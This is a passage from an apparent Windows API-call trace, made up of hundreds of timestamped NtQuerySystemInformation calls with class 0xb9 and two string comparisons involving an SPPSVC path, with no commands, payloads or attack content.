ResultLength=0x0) [0239.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0239.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0239.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0239.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0239.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0239.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0239.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0239.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0239.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0239.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0239.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0239.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0239.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8a0, Length=0x28, ResultLength=0x0) [0239.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0239.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0239.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e880, Length=0x20, ResultLength=0x0) [0239.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0239.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0239.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0239.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0239.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.864] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0239.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.873] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0239.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) 